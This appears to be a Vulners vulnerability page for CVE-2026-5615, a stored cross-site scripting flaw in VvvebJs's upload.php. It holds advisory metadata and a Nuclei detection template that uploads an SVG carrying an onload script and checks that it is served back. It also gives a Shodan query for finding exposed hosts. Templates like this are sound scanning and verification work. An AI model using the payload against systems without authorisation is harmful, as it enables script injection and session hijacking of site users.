| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2026-5615 | 6 Apr 202603:00 | – | attackerkb | |
| CVE-2026-5615 | 6 Apr 202606:16 | – | circl | |
| VvvebJs 代码注入漏洞 | 6 Apr 202600:00 | – | cnnvd | |
| CVE-2026-5615 | 6 Apr 202603:00 | – | cve | |
| CVE-2026-5615 givanz Vvvebjs File Upload Endpoint upload.php cross site scripting | 6 Apr 202603:00 | – | cvelist | |
| Exploit for CVE-2026-5615 | 7 May 202614:48 | – | githubexploit | |
| EUVD-2026-19160 | 6 Apr 202606:30 | – | euvd | |
| CVE-2026-5615 | 6 Apr 202604:16 | – | nvd | |
| CVE-2026-5615 givanz Vvvebjs File Upload Endpoint upload.php cross site scripting | 6 Apr 202603:00 | – | osv | |
| PT-2026-30559 | 6 Apr 202600:00 | – | ptsecurity |
| Source | Link |
|---|---|
| github | www.github.com/advisories/GHSA-p873-9x3v-gmvh |
| github | www.github.com/givanz/VvvebJs |
id: CVE-2026-5615
info:
name: VvvebJs <= 2.0.5 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
Givanz Vvvebjs <= 2.0.5 contains a stored XSS caused by manipulation of the "uploadAllowExtensions" argument in upload.php File Upload Endpoint, letting remote attackers execute scripts, exploit requires crafted input.
impact: |
Remote attackers can execute arbitrary scripts, potentially leading to session hijacking or user impersonation.
remediation: |
Apply the patch 8cac22cff99b8bc701c408aa8e887fa702755336 or update to the fixed version.
reference:
- https://github.com/advisories/GHSA-p873-9x3v-gmvh
- https://github.com/givanz/VvvebJs
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2026-5615
epss-score: 0.00773
epss-percentile: 0.51268
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
shodan-query: http.html:"VvvebJs"
tags: cve,cve2026,xss,stored-xss,file-upload,svg,vvvebjs
flow: http(1) && http(2)
http:
- raw:
- |
POST /upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=--nuclei{{randstr_1}}
----nuclei{{randstr_1}}
Content-Disposition: form-data; name="file"; filename="{{randstr}}.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
<text x="10" y="20">{{randstr}}</text>
</svg>
----nuclei{{randstr_1}}--
matchers:
- type: dsl
dsl:
- 'status_code == 200'
internal: true
extractors:
- type: regex
name: upload_path
part: body
group: 0
regex:
- '/[a-zA-Z0-9_-]+\.svg'
internal: true
- raw:
- |
GET {{upload_path}} HTTP/1.1
Host: {{Hostname}}
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains_all(body, "{{randstr}}", "<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\">")'
- 'contains(content_type, "image/svg+xml")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100f0d589afd4568309e9d1409e418698f63e8235d52f0d89ff20cd5fb364567cd102204c323824eee3182ed290a4adc04c8f869c92a3db457bab8c64e64e4c38e7d4d9:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation